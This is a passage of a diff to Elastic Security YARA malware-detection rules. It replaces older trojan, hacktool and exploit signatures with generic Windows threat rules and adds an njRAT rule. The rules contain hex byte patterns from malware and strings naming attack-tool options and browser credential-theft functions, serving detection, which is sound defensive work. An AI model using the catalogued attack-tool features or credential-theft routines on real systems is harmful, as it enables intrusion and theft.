04 01 C3 AA 89 D8 ?? ?? ?? ?? ?? 85 C0 74 07 89 C2 C1 EA 18 31 D3 F7 D0 21 C3 E2 DF 87 DA } condition: all of them } -rule ELASTIC_Windows_Trojan_Generic_4Fbff084 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_E8Abb835 : FILE MEMORY { meta: - description = "Shellcode found in REF2924, belonging to for now unknown trojan" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "4fbff084-5280-4ff8-9c21-c437207231a5" - date = "2023-02-28" - modified = "2023-04-23" + id = "e8abb835-f0c1-4e27-a0ca-3a3cae3362df" + date = "2024-03-26" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Generic.yar#L154-L175" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7010a69ba77e65e70f4f3f4a10af804e6932c2218ff4abd5f81240026822b401" - logic_hash = "47d1a01e0edee3239d99ff1f32eb4cfc77d6e38823fed799a562e142d3d3a22d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3324-L3342" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e42262671325bec300afa722cefb584e477c3f2782c8d4c6402d6863df348cac" + logic_hash = "0ad56b8c741a79a600a0d5588c4e8760a6d19fef72ff7814a00cfb84a90f23aa" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "728d7877e7a16fbb756b1c3b6c90ff3b718f0f750803b6a1549cb32c69be0dfc" - threat_name = "Windows.Trojan.Generic" - severity = 100 + fingerprint = "ca8c2f4b16ebe1bb48c91a536d8aca98bed5592675eff9311e77d7e06dfe3c5b" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $string_decryption = { 8A 44 30 ?? 8A CD 88 45 ?? 32 C5 C0 C1 ?? 88 04 3E 0F B6 C5 0F B6 D9 0F AF D8 0F B6 C1 0F B6 D1 88 6D ?? 0F AF D0 0F B6 C5 0F B6 CD 0F AF C8 8A 6D ?? 8A 45 ?? C0 CB ?? 02 D1 32 DA 02 EB 88 6D ?? 38 45 ?? 74 ?? 8B 45 ?? 46 81 FE ?? ?? ?? ?? 7C ?? } - $thread_start = { E8 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? BB ?? ?? ?? ?? 50 6A ?? 5A 8B CF 89 5C 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 89 5C 24 ?? 50 6A ?? 5A 8B CF E8 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 89 5C 24 ?? 50 6A ?? 5A 8B CF E8 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 89 5C 24 ?? 50 6A ?? 5A 8B CF E8 ?? ?? ?? ?? } - $resolve = { 8B 7A ?? 8D 5D ?? 85 FF 74 ?? 0F B7 0F 8D 7F ?? 8D 41 ?? 83 F8 ?? 77 ?? 83 C1 ?? 0F B7 33 83 C3 ?? 8D 46 ?? 83 F8 ?? 77 ?? 83 C6 ?? 85 C9 } + $a1 = { 48 81 EC 28 05 00 00 66 44 0F 7F 84 24 10 05 00 00 66 0F 7F BC 24 00 05 00 00 0F 29 B4 24 F0 04 00 00 44 89 44 24 74 48 89 94 24 C8 00 00 00 48 89 CB 48 C7 44 24 78 00 00 00 00 0F 57 F6 0F 29 } condition: - 2 of them + all of them } -rule ELASTIC_Windows_Trojan_Generic_73Ed7375 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_492D7223 : FILE MEMORY { meta: - description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "73ed7375-c8ab-4d95-ae66-62b1b02a3d1e" - date = "2023-05-09" - modified = "2023-06-13" + id = "492d7223-4e03-4a77-83e5-ed85e052f846" + date = "2024-03-26" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Generic.yar#L177-L196" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2b17328a3ef0e389419c9c86f81db4118cf79640799e5c6fdc97de0fc65ad556" - logic_hash = "7e27c9377d0b2058a2a36da4ac7d37a54c566f3246e69aa356171edae6b478c5" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3344-L3362" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c0d9c9297836aceb4400bcb0877d1df90ca387f18f735de195852a909c67b7ef" + logic_hash = "9fb2a00def86ed8476d906514a0bc630e28093ac37d757541d8801d2c8e0efc3" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a026cc2db3bfebca4b4ea6e9dc41c2b18d0db730754ef3131d812d7ef9cd17d6" - severity = 100 + fingerprint = "71a1bce450522a0a6ff38d2f84ab91e2e9db360736c2f7233124a0b0dc4d0431" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 48 8B 03 48 8B CE 49 8D 54 04 02 41 FF D6 48 89 03 48 83 C3 08 48 } - $a2 = { 41 3C 42 8B BC 08 88 00 00 00 46 8B 54 0F 20 42 8B 5C 0F 24 4D } + $a1 = { 55 89 E5 53 57 56 83 EC 24 ?? ?? ?? ?? ?? 31 C9 85 C0 0F 94 C1 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 01 C8 40 FF E0 } condition: all of them } -rule ELASTIC_Windows_Trojan_Generic_96Cdf3C4 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Ea296356 : FILE MEMORY { meta: - description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "96cdf3c4-6f40-4eb3-8bfd-b3c41422388a" - date = "2023-05-09" - modified = "2023-06-13" + id = "ea296356-6533-4364-8ad1-3bbb538e3d61" + date = "2024-05-22" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Generic.yar#L198-L217" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9a4d68de36f1706a3083de7eb41f839d8c7a4b8b585cc767353df12866a48c81" - logic_hash = "f92e5549aca320d71e1eec8daa82e8bbf3517c7f23f376bb355fdfa32da2e7a9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3364-L3382" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4c48a0fe90f3da7bfdd32961da7771a0124b77e1ac1910168020babe8143e959" + logic_hash = "73ffd16f0047cd57311853aa9083fc21427f2eb21646c6edc7b8def86da90f90" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1037576e2c819031d5dc8067650c6b869e4d352ab7553fb5676a358059b37943" - severity = 100 + fingerprint = "a17ca2f95473517428867b4f68b8275ae84ef1ee39421e76887077e206b1ed51" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 74 24 28 48 8B 46 10 48 8B 4E 18 E8 9A CA F8 FF 84 C0 74 27 48 8B 54 } - $a2 = { F2 74 28 48 89 54 24 18 48 89 D9 48 89 D3 E8 55 40 FF FF 84 C0 } + $a1 = { 55 8B EC 83 EC 0C 53 56 8B 75 08 8B C6 89 55 FC 99 2B C2 89 4D F8 8B D8 8B 45 FC 57 D1 FB 33 FF 8D 14 30 89 55 08 85 DB 7E 36 4A 0F 1F 44 00 00 8A 0C 38 8D 52 FF 0F B6 42 01 8B 75 FC 0F B6 80 } condition: all of them } -rule ELASTIC_Windows_Trojan_Generic_F0C79978 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Aeaeb5Cf : FILE MEMORY { meta: - description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "f0c79978-2df9-4ae2-bc5d-b5366acff41b" - date = "2023-07-27" - modified = "2023-09-20" + id = "aeaeb5cf-2683-4a88-b736-4b8873d92fc5" + date = "2024-05-22" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Generic.yar#L219-L238" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8f800b35bfbc8474f64b76199b846fe56b24a3ffd8c7529b92ff98a450d3bd38" - logic_hash = "b16971ed0947660dda8d79c11531a9498a80e00f2dbc2c0eb63895b7f5c5f980" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3384-L3402" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f57d955d485904f0c729acff9db1de9cb42f32af993393d58538f07fa273b431" + logic_hash = "640966296bad70234e0fe7b6f87b92fcf4fc111189d307d44f32e926785f76cb" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "94b2a5784ae843b831f9ce34e986b2687ded5c754edf44ff20490b851e0261fc" - severity = 100 + fingerprint = "f6d32006747b083632f551c8ca182b6b4d67a8f130a118e61b0dd2f35d7d8477" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "\\IronPython." - $a2 = "\\helpers\\execassembly_x64" + $a1 = { 55 8B EC 8B 4D 08 33 C0 66 39 01 74 0B 8D 49 00 40 66 83 3C 41 00 75 F8 8D 04 45 02 00 00 00 50 FF 75 0C 51 ?? ?? ?? ?? ?? 83 C4 0C 5D C3 CC CC 55 8B EC 6A 00 FF 75 08 } condition: all of them } -rule ELASTIC_Windows_Trojan_Generic_40899C85 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_C8424507 : FILE MEMORY { meta: - description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "40899c85-bb49-412c-8081-3a1359957c52" - date = "2023-12-15" - modified = "2024-01-12" + id = "c8424507-34e1-4649-a4e4-3e0a0f62dfb0" + date = "2024-05-22" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Generic.yar#L240-L260" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "88eb4f2e7085947bfbd03c69573fdca0de4a74bab844f09ecfcf88e358af20cc" - logic_hash = "317034add0343baa26548712de8b2acc04946385fbee048cea0bd8d7ae642b36" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3404-L3423" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d556b02733385b823cfe4db7e562e90aa520e2e6fb00fceb76cc0a6a1ff47692" + logic_hash = "78d56257cb6e1d67f9343ee30b844fe20138e27ca3b6312a07112e5dbb797851" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "d02a17a3b9efc2fd991320a5db7ab2384f573002157cddcd12becf137e893bd8" - severity = 100 + fingerprint = "8dfb14903b32c118492ae7e0aab9cf634c58ea93fcbc7759615209f61b3b3d6b" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = "_sqlDataTypeSize" - $a2 = "ChromeGetName" - $a3 = "get_os_crypt" + $a1 = { 78 75 73 65 68 6F 62 69 6D 6F 7A 61 63 6F 67 6F 6A 69 68 6F 67 69 76 6F } + $a2 = { 62 65 6D 69 74 69 76 65 67 69 77 6F 6D 65 7A 75 76 65 62 61 67 } condition: all of them } -rule ELASTIC_Windows_Trojan_Generic_9997489C : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_9Af87Ddb : FILE MEMORY { meta: - description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "9997489c-4e22-4df1-90cb-dd098ca26505" - date = "2024-01-31" - modified = "2024-02-08" + id = "9af87ddb-c3ed-44a5-b1a1-984b6f8a6065" + date = "2024-05-23" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Generic.yar#L262-L290" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "857bbf64ced06f76eb50afbfbb699c62e11625196213c2e5267b828cca911b74" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3425-L3443" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b1fbc11744e21dc08599412887a3a966572614ce25ccd3c8c98f04bcbdda3898" + logic_hash = "99174c5740324d7704a5c6ae924254f9b5f241c97901dfdb771fc176a76e4a30" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4c872be4e5eaf46c92e6f7d62ed0801992c36fee04ada1a1a3039890e2893d8c" - severity = 100 + fingerprint = "1505b6299961c729077ffd90a4c7ed3180f55329952841fe7045056ea2919de8" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $ldrload_dll = { 43 6A 45 9E } - $loadlibraryw = { F1 2F 07 B7 } - $ntallocatevirtualmemory = { EC B8 83 F7 } - $ntcreatethreadex = { B0 CF 18 AF } - $ntqueryinformationprocess = { C2 5D DC 8C } - $ntprotectvirtualmemory = { 88 28 E9 50 } - $ntreadvirtualmemory = { 03 81 28 A3 } - $ntwritevirtualmemory = { 92 01 17 C3 } - $rtladdvectoredexceptionhandler = { 89 6C F0 2D } - $rtlallocateheap = { 5A 4C E9 3B } - $rtlqueueworkitem = { 8E 02 92 AE } - $virtualprotect = { 0D 50 57 E8 } + $a1 = { 28 00 00 0A 28 2C 00 00 06 11 06 17 D6 13 06 11 06 11 07 8E B7 32 98 06 17 D6 0A 20 E8 03 00 00 28 21 00 00 0A 7E 0F 00 00 04 3A 74 FF FF FF 2A 00 1B 30 04 00 96 00 00 00 1F 00 00 11 03 39 88 } condition: - 4 of them + all of them } -rule ELASTIC_Windows_Trojan_Generic_2993E5A5 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_D7B57912 : FILE MEMORY { meta: - description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "2993e5a5-26b2-4cfd-8130-4779abcfecb2" - date = "2024-03-18" - modified = "2024-03-18" + id = "d7b57912-02b4-421a-8f93-9e8371314e68" + date = "2024-05-23" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Generic.yar#L292-L310" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9f9b926cef69e879462d9fa914dda8c60a01f3d409b55afb68c3fb94bf1a339b" - logic_hash = "37a10597d1afeb9411f6c652537186628291cbe6af680abe12bb96591add7e78" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3445-L3463" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0906599be152dd598c7f540498c44cc38efe9ea976731da05137ee6520288fe4" + logic_hash = "a774e3030d81e29805a9784cfbbc0b69c4fedebe0daa25e403777e1f46f9094f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "709015984e3c9abaf141b76bf574921466493475182ca30a56dbc3671030b632" - severity = 100 + fingerprint = "36a3fecc918cd891d9c779f7ff54019908ba190853739c8059adb84233643a1c" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a = { 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89 } + $a1 = { 55 8B EC 83 C4 B8 53 56 8B DA 89 45 FC 8D 45 FC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 64 FF 30 64 89 20 8B C3 ?? ?? ?? ?? ?? 6A 00 6A 00 8D 45 F0 50 8B 45 FC } condition: - 1 of them + all of them } -rule ELASTIC_Windows_Trojan_Generic_0E135D58 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_23D33B48 : FILE MEMORY { meta: - description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "0e135d58-efd9-4d5e-95d8-ddd597f8e6a8" - date = "2024-03-19" - modified = "2024-03-19" + id = "23d33b48-00f6-487f-a3e5-f41603fc982e" + date = "2024-06-05" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Generic.yar#L312-L330" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c" - logic_hash = "bc10218b1d761f72836bb5f9bb41d3f0fe13c4baa1109025269f938ec642aec4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3465-L3483" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "acbc22df07888498ae6f52f5458e3fb8e0682e443a8c2bc97177a0320b4e2098" + logic_hash = "c9fb93bb74e4d45197d0da5b641860738a42a583b15cc098e86ea79bb8690bf7" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e1a9e0c4e5531ae4dd2962285789c3bb8bb2621aa20437384fc3abcc349718c6" - severity = 100 + fingerprint = "7a25301a1297337810240e8880febe525726c9b79a4a4bd81b1f856865097995" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a = { 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B } + $a1 = { 55 8B EC 51 83 7A 14 10 8B C2 53 56 57 8B F1 72 02 8B 02 83 7E 14 10 72 02 8B 0E 8B 5A 10 8D 56 10 8B 3A 53 50 89 55 FC 8B D7 51 ?? ?? ?? ?? ?? 8B D0 83 C4 0C 83 FA FF 74 30 3B FA 72 33 8B C7 } condition: - 1 of them + all of them } -rule ELASTIC_Windows_Hacktool_Sharpsccm_9Bef8Dab : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_4B0B73Ce : FILE MEMORY { meta: - description = "Detects Windows Hacktool Sharpsccm (Windows.Hacktool.SharpSCCM)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "9bef8dab-af2e-46be-811a-0ac78d74a4ef" - date = "2024-03-25" - modified = "2024-05-08" + id = "4b0b73ce-960d-40ce-ae85-5cf38d949f45" + date = "2024-06-05" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_SharpSCCM.yar#L1-L31" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2e169c4fd16627029445bb0365a2f9ee61ab6b3757b8ad02fd210ce85dc9c97f" - logic_hash = "560c780934a63b3c857a09841c09cbc350205868c696fac958e249e1379cc865" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3485-L3503" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "236fc00cd7c75f70904239935ab90f51b03ff347798f56cec1bdd73a286b24c1" + logic_hash = "d53923df612dd7fe0b1b2c94c1c5d747b08723df129089326ec27c5049769cef" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "dfbb7f142628eb7dc6c96dd271562d88a0970534af85464c10232ec01f58e35b" - severity = 100 + fingerprint = "11c544f9f3a51ffcd361d6558754a64a8a38f3ce9385038880ab58c99769db88" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $name = "SharpSCCM" wide fullword - $s1 = "--relay-server" wide fullword - $s2 = "--username" wide fullword - $s3 = "--domain" wide fullword - $s4 = "--sms-provider" wide fullword - $s5 = "--wmi-namespace" wide fullword - $s6 = "--management-point" wide fullword - $s7 = "--get-system" wide fullword - $s8 = "--run-as-user" wide fullword - $s9 = "--register-client" wide fullword - $s10 = "MS_Collection" wide fullword - $s11 = "SOFTWARE\\Microsoft\\CCM" wide fullword - $s12 = "CCM_POST" wide fullword + $a1 = { 55 8B EC 51 53 56 57 8B 7D 08 83 7F 18 00 C6 45 FF C9 74 54 ?? ?? ?? ?? ?? ?? 8D 9B 00 00 00 00 33 F6 83 7F 18 00 74 40 6A 0A FF D3 46 81 FE E8 03 00 00 7C ED 8B 07 8B 50 08 6A 01 8D 4D FF 51 } condition: - ($name and 2 of ($s*)) or 7 of ($s*) + all of them } -rule ELASTIC_Linux_Exploit_Ramen_01B205Eb : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_1F2E969C : FILE MEMORY { meta: - description = "Detects Linux Exploit Ramen (Linux.Exploit.Ramen)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "01b205eb-4718-4ffd-9fdc-b9de567c4603" - date = "2021-04-06" - modified = "2021-09-16" + id = "1f2e969c-5d90-4bab-a06a-9cccb1946251" + date = "2024-06-05" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Ramen.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c0b6303300f38013840abe17abe192db6a99ace78c83bc7ef705f5c568bc98fd" - logic_hash = "e477e93434db9e650f159995f2cb754394f3187dc341d2ea4c2466924e19a8a6" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L3505-L3523" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7def75df729ed66511fbe91eadf15bc69a03618e78c48e27c35497db2a6a97ae" + logic_hash = "7d984a902f9bf40c9b49da89aba9249f80b41b24ca1cdb6189f541b40ef41742" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a39afcf7cec82dc511fd39b4a019ef161250afe7cb0880e488badb56d021cc9f" - severity = 100 + fingerprint = "e7c872f2422fe54367900d69c9bb94d86db2bf001cbbe00ba6c801fb3d1e610e" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 00 31 C0 31 DB 31 C9 B0 46 CD 80 31 C0 31 DB 43 } + $a1 = { 55 8B EC 51 53 8B 5A 10 56 8B F1 57 6A 78 89 75 FC C7 46 10 00 00 00 00 C7 46 14 0F 00 00 00 53 89 75 FC C6 06 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 33 C0 89 7D FC 85 DB 7E 39 0F 1F 40 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Nighthawk_9F3A5Abb : FILE MEMORY +rule ELASTIC_Windows_Trojan_Njrat_30F3C220 : FILE MEMORY { meta: - description = "Detects Windows Trojan Nighthawk (Windows.Trojan.Nighthawk)" + description = "Detects Windows Trojan Njrat (Windows.Trojan.Njrat)" author = "Elastic Security" - id = "9f3a5abb-b329-44db-af71-d72eae2737ac" - date = "2022-11-24" - modified = "2023-06-20" + id = "30f3c220-b8dc-45a1-bcf0-027c2f76fa63" + date = "2021-06-13" + modified = "2021-10-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Nighthawk.yar#L1-L26" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b775a8f7629966592cc7727e2081924a7d7cf83edd7447aa60627a2b67d87c94" - logic_hash = "27a34e48141fe260c16c12a2652e440d2540ca5f0c84b41c9c4762dcab44ffd4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Njrat.yar#L1-L24" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b" + logic_hash = "76347165829415646f943bb984cd17ca138cf238d03f114c498dbcec081d5ae3" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a2c49831d048ba91951780f4295895eba3a15f489a39b26b7a27efbc81746e09" + fingerprint = "d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -88782,35 +88925,33 @@ rule ELASTIC_Windows_Trojan_Nighthawk_9F3A5Abb : FILE MEMORY os = "windows" strings: - $loader_build_iat0 = { B9 BF BF D1 D5 E8 ?? ?? ?? ?? BA 7C 75 84 91 [3-12] E8 ?? ?? ?? ?? BA 47 FB EB 2B [3-12] E8 ?? ?? ?? ?? BA 42 24 3D 39 [3-12] E8 ?? ?? ?? ?? BA E7 E9 EF EE [3-12] E8 ?? ?? ?? ?? BA 47 FD 36 2E [3-12] E8 ?? ?? ?? ?? BA 39 DE 19 3D [3-12] E8 ?? ?? ?? ?? BA 20 DF DB F7 [3-12] E8 ?? ?? ?? ?? BA 45 34 2A 41 [3-12] E8 ?? ?? ?? ?? BA 7D 1C 44 2E [3-12] E8 ?? ?? ?? ?? BA 7D 28 44 2E [3-12] E8 ?? ?? ?? ?? BA 94 36 65 8D [3-12] E8 ?? ?? ?? ?? } - $loader_syscall_func = { 65 48 8B 04 25 30 00 00 00 48 8B 80 10 01 00 00 48 89 44 24 F0 65 48 8B 04 25 30 00 00 00 8B 40 68 49 89 CA FF 64 24 F0 } - $seq_calc_offset = { 48 8D 0D ?? ?? ?? ?? 51 5A 48 81 C1 ?? ?? ?? ?? 48 81 C2 ?? ?? ?? ?? FF E2 } - $seq_keying_registry = { BA ?? ?? ?? ?? 48 8B C8 48 8B D8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B CB 4C 8B F0 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B CB 4C 8B F8 E8 ?? ?? ?? ?? 0F B6 4E ?? 48 8B D8 83 E9 ?? 74 ?? 83 F9 ?? 75 ?? 48 C7 C1 ?? ?? ?? ?? EB ?? } - $seq_keying_hostname_user = { 40 53 48 83 EC ?? 8A 42 ?? 48 8B D9 3C ?? 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 53 ?? 48 8D 4B ?? C7 02 ?? ?? ?? ?? FF D0 85 C0 0F 95 C0 EB ?? } - $seq_keying_file = { E8 